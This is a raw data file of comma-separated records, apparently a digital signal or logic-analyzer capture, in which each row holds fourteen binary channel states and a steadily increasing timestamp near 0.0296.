0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9553716e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9553740e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9553768e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9553792e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9553820e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9553844e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9553868e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9553892e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9553916e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9553940e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9553968e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9553992e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9554020e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9554044e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9554068e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9554092e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9554116e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9554140e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9554168e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9554192e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9554220e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9554244e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9554268e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9554292e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9554316e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9554340e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9554368e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9554392e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9554420e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9554444e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9554468e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9554492e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9554516e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9554540e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9554568e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9554592e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9554620e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9554644e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9554668e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9554692e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9554716e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9554740e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9554768e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9554792e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9554820e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9554844e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9554868e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9554892e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9554916e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9554940e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9554968e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9554992e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9555020e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,1,2.9679424e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,1,2.9679644e-02 1,0,0,0,1,1,0,0,0,1,0,1,0,1,2.9679664e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,1,2.9679692e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,1,2.9680020e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,1,2.9680044e-02 1,0,0,0,1,1,0,0,0,0,0,0,0,1,2.9680048e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,1,2.9680052e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,1,2.9680068e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,1,2.9680092e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,1,2.9680116e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,1,2.9680140e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,1,2.9680168e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,1,2.9680192e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,1,2.9680220e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,1,2.9680244e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9680256e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9680268e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9680292e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9680316e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9680340e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9680368e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9680392e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9680420e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9680444e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9680468e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9680492e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9680500e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.9680544e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9680568e-02 1,0,0,0,1,1,0,0,0,0,0,0,0,0,2.9680572e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9680576e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9680592e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9680620e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9680644e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9680668e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9680692e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9680716e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9680724e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.9680764e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9680788e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9680796e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9680816e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9680840e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9680864e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9680892e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9680916e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9680940e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9680964e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9680988e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9680996e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.9681012e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9681040e-02 1,0,0,0,1,1,0,0,0,0,0,0,0,0,2.9681044e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9681048e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9681068e-02 1,0,0,0,1,0,0,0,0,1,0,0,0,0,2.9681092e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9681096e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.9681140e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9681164e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.9681188e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9681216e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9681220e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9681240e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9681268e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9681292e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9681316e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9681340e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9681364e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9681372e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.9681416e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9681440e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9681448e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9681468e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9681492e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9681516e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9681540e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9681544e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.9681588e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9681616e-02 1,0,0,0,1,1,0,0,0,0,0,0,0,0,2.9681620e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9681624e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9681640e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9681668e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9681692e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9681716e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9681740e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9681764e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9681788e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9681812e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9681840e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9681868e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9681892e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9681916e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9681940e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9681964e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9681972e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.9681988e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9682016e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.9682040e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9682068e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.9682092e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9682116e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9682124e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9682164e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9682188e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9682216e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9682240e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9682244e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.9682292e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9682316e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.9682340e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9682364e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9682372e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9682388e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9682416e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9682440e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9682468e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9682492e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9682516e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9682520e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.9682564e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9682588e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9682596e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9682616e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9682640e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9682664e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9682692e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9682716e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9682740e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9682764e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9682788e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9682812e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9682840e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9682868e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9682892e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9682916e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9682940e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9682964e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9682988e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9683016e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9683040e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9683068e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9683092e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9683116e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9683140e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9683144e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.9683188e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9683216e-02 1,0,0,0,1,1,0,0,0,0,0,0,0,0,2.9683220e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9683224e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9683240e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9683268e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9683292e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9683316e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9683340e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9683364e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9683372e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.9683388e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9683416e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9683420e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9683468e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9683492e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9683540e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9683564e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9683588e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9683616e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9683640e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9683668e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.9683692e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9683716e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9683724e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9683740e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9683764e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9683788e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9683816e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9683820e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.9683868e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9683892e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9683900e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9683916e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9683940e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9683964e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9683988e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9684016e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9684040e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9684068e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9684092e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9684116e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9684140e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9684164e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9684188e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9684216e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9684240e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9684268e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9684292e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9684316e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9684340e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9684364e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9684388e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9684416e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9684440e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9684464e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9684492e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.9684516e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9684540e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9684548e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9684588e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9684616e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9684668e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9684692e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9684716e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9684740e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9684764e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9684788e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9684796e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.9684816e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9684840e-02 1,0,0,0,1,1,0,0,0,0,0,0,0,0,2.9684844e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9684848e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9684868e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9684892e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.9684940e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9684964e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9684972e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9684988e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9685016e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9685040e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9685064e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9685092e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9685116e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9685140e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9685164e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9685172e-02 1,0,0,0,1,1,0,0,0,1,0,0,1,0,2.9685216e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9685240e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9685248e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9685268e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9685292e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9685316e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9685340e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9685364e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9685388e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9685416e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9685440e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9685468e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9685492e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9685516e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9685540e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9685564e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9685588e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9685616e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9685640e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9685664e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9685692e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9685716e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9685740e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9685764e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9685788e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9685812e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9685840e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9685868e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9685892e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9685916e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9685940e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9685964e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9685988e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9686012e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9686040e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9686068e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9686092e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9686116e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9686140e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9686164e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9686188e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9686216e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9686240e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9686264e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9686292e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9686316e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9686340e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9686364e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9686388e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9686412e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9686440e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9686468e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9686492e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9686516e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9686540e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9686564e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9686588e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9686616e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9686640e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9686668e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9686692e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9686716e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9686740e-02 1,0,0,0,1,0,0,0,0,0,0,0,1,0,2.9686768e-02 1,0,0,0,1,0,0,0,0,0,0,0,0,0,2.9686788e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9686796e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,1,2.9811328e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,1,2.9811568e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,1,2.9811588e-02 0,1,0,0,1,1,0,0,0,1,0,1,0,1,2.9811620e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,1,2.9811644e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,1,2.9811960e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,1,2.9811988e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,1,2.9811992e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,1,2.9812012e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,1,2.9812036e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,1,2.9812060e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,1,2.9812084e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,1,2.9812108e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,1,2.9812136e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,1,2.9812160e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,1,2.9812188e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,1,2.9812212e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9812228e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9812236e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9812260e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9812284e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9812308e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9812336e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9812360e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9812388e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9812412e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9812436e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9812440e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.9812484e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9812508e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9812516e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9812536e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9812560e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9812588e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9812612e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9812636e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9812660e-02 0,1,0,0,1,0,0,0,0,1,0,0,0,0,2.9812664e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9812668e-02 0,1,0,0,1,1,0,0,0,1,0,0,1,0,2.9812712e-02 0,1,0,0,1,1,0,0,0,1,0,0,0,0,2.9812736e-02 0,1,0,0,1,1,0,0,0,0,0,0,0,0,2.9812740e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9812744e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9812760e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9812788e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9812812e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9812836e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9812860e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9812884e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9812908e-02 0,1,0,0,1,0,0,0,0,0,0,0,0,0,2.9812936e-02 0,1,0,0,1,0,0,0,0,0,0,0,1,0,2.9812960e-02 